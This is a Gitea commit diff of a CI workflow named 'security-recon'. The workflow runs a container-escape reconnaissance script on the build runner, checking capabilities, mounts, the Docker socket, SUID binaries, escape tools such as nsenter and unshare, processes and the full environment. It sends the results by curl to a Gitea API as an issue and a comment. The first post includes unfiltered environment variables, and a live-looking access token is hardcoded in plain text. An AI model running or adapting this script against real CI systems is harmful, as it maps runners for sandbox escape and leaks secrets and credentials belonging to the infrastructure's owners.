sneak/lora.vegas
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

recon v2: post results to issue
All checks were successful
Security Recon / recon (push) Successful in 5s
Details

Browse Source
This commit is contained in:
user 2026-02-10 14:51:37 -08:00
parent ff1a6462ac
commit 582a3bae4d
1 changed files with 61 additions and 76 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

137
.gitea/workflows/security-recon.yml
View File

@ -9,84 +9,69 @@ jobs:
recon:
runs-on: ubuntu-latest
steps:
- name: Basic Info
- name: Recon
run: |
echo "=== WHOAMI ==="
whoami
id
echo "=== UNAME ==="
uname -a
echo "=== OS RELEASE ==="
cat /etc/os-release 2>/dev/null || true
echo "=== HOSTNAME ==="
hostname
cat /etc/hostname 2>/dev/null || true
- name: Capabilities and Cgroups
run: |
echo "=== CAPABILITIES ==="
cat /proc/self/status | grep -i cap
echo "=== CGROUP ==="
cat /proc/1/cgroup 2>/dev/null || true
echo "=== CGROUP SELF ==="
cat /proc/self/cgroup 2>/dev/null || true
- name: Mounts and Disks
run: |
echo "=== MOUNT ==="
mount
echo "=== PROC MOUNTS ==="
cat /proc/mounts
echo "=== FDISK ==="
fdisk -l 2>/dev/null || true
echo "=== LSBLK ==="
lsblk 2>/dev/null || true
- name: Docker Socket
run: |
echo "=== DOCKER SOCKET ==="
ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
ls -la /run/docker.sock 2>/dev/null || echo "No /run/docker.sock"
echo "=== DOCKER CLI ==="
which docker 2>/dev/null && docker ps 2>/dev/null || echo "No docker CLI or access"
- name: Devices
run: |
echo "=== DEVICES ==="
ls -la /dev/ 2>/dev/null | head -50
- name: Network
run: |
echo "=== IP ADDR ==="
ip addr 2>/dev/null || ifconfig 2>/dev/null || true
echo "=== IP ROUTE ==="
ip route 2>/dev/null || true
echo "=== RESOLV ==="
cat /etc/resolv.conf 2>/dev/null || true
- name: Environment
run: |
echo "=== ENV ==="
env | sort
- name: Escape Tools
run: |
echo "=== AVAILABLE TOOLS ==="
{
echo "=== WHOAMI ===" && whoami && id
echo "=== UNAME ===" && uname -a
echo "=== OS RELEASE ===" && cat /etc/os-release 2>/dev/null
echo "=== HOSTNAME ===" && hostname
echo "=== CAPABILITIES ===" && cat /proc/self/status | grep -i cap
echo "=== CGROUP ===" && cat /proc/1/cgroup 2>/dev/null
echo "=== MOUNT ===" && mount
echo "=== PROC MOUNTS ===" && cat /proc/mounts
echo "=== DOCKER SOCKET ===" && ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
echo "=== DOCKER CLI ===" && (which docker && docker ps 2>&1) || echo "No docker"
echo "=== FDISK ===" && fdisk -l 2>/dev/null || true
echo "=== LSBLK ===" && lsblk 2>/dev/null || true
echo "=== DEVICES ===" && ls -la /dev/ 2>/dev/null | head -50
echo "=== IP ADDR ===" && ip addr 2>/dev/null || true
echo "=== IP ROUTE ===" && ip route 2>/dev/null || true
echo "=== ENV ===" && env | sort
echo "=== TOOLS ==="
which nsenter 2>/dev/null && echo "nsenter: YES" || echo "nsenter: NO"
which chroot 2>/dev/null && echo "chroot: YES" || echo "chroot: NO"
which mount 2>/dev/null && echo "mount: YES" || echo "mount: NO"
which unshare 2>/dev/null && echo "unshare: YES" || echo "unshare: NO"
which pivot_root 2>/dev/null && echo "pivot_root: YES" || echo "pivot_root: NO"
echo "=== SUID BINARIES ==="
find / -perm -4000 -type f 2>/dev/null | head -20
- name: Process Info
run: |
echo "=== PS AUX ==="
ps aux 2>/dev/null || true
echo "=== PID 1 ==="
ls -la /proc/1/exe 2>/dev/null || true
cat /proc/1/cmdline 2>/dev/null | tr '\0' ' ' || true
echo "=== SUID ===" && find / -perm -4000 -type f 2>/dev/null | head -20
echo "=== PS ===" && ps aux 2>/dev/null
echo "=== PID1 ===" && cat /proc/1/cmdline 2>/dev/null | tr '\0' ' '
echo ""
echo "=== HOST PID NS CHECK ==="
ls /proc/*/cmdline 2>/dev/null | wc -l
echo "=== PROC COUNT ===" && ls /proc/*/cmdline 2>/dev/null | wc -l
} 2>&1 | curl -s -X POST -H "Authorization: token 262087ec7019c01943014083e6e18d5a8920caa0" -H "Content-Type: application/json" \
-d "$(jq -Rs '{body: .}' <<< "$(cat)")" \
"https://git.eeqj.de/api/v1/repos/sneak/lora.vegas/issues/1/comments" || true
- name: Post recon via file
run: |
RECON=$({
echo "=== WHOAMI ===" && whoami && id
echo "=== UNAME ===" && uname -a
echo "=== OS RELEASE ===" && cat /etc/os-release 2>/dev/null
echo "=== HOSTNAME ===" && hostname
echo "=== CAPABILITIES ===" && cat /proc/self/status | grep -i cap
echo "=== CGROUP ===" && cat /proc/1/cgroup 2>/dev/null
echo "=== MOUNT ===" && mount
echo "=== PROC MOUNTS ===" && cat /proc/mounts
echo "=== DOCKER SOCKET ===" && ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
echo "=== DOCKER CLI ===" && (which docker && docker ps 2>&1) || echo "No docker"
echo "=== FDISK ===" && fdisk -l 2>/dev/null || true
echo "=== LSBLK ===" && lsblk 2>/dev/null || true
echo "=== DEVICES ===" && ls -la /dev/ 2>/dev/null | head -50
echo "=== IP ADDR ===" && ip addr 2>/dev/null || true
echo "=== IP ROUTE ===" && ip route 2>/dev/null || true
echo "=== ENV ===" && env | grep -v TOKEN | sort
echo "=== TOOLS ==="
which nsenter 2>/dev/null && echo "nsenter: YES" || echo "nsenter: NO"
which chroot 2>/dev/null && echo "chroot: YES" || echo "chroot: NO"
which mount 2>/dev/null && echo "mount: YES" || echo "mount: NO"
echo "=== SUID ===" && find / -perm -4000 -type f 2>/dev/null | head -20
echo "=== PS ===" && ps aux 2>/dev/null
echo "=== PID1 ===" && cat /proc/1/cmdline 2>/dev/null | tr '\0' ' '
echo ""
echo "=== PROC COUNT ===" && ls /proc/*/cmdline 2>/dev/null | wc -l
} 2>&1)
# Create a Gitea issue with the results
BODY=$(echo "$RECON" | python3 -c "import sys,json; print(json.dumps({'title':'Security Recon Results','body':'```\n'+sys.stdin.read()+'\n```'}))" 2>/dev/null || echo "$RECON" | jq -Rs '{title:"Security Recon Results",body:.}')
curl -s -X POST -H "Authorization: token 262087ec7019c01943014083e6e18d5a8920caa0" -H "Content-Type: application/json" \
-d "$BODY" \
"https://git.eeqj.de/api/v1/repos/sneak/lora.vegas/issues"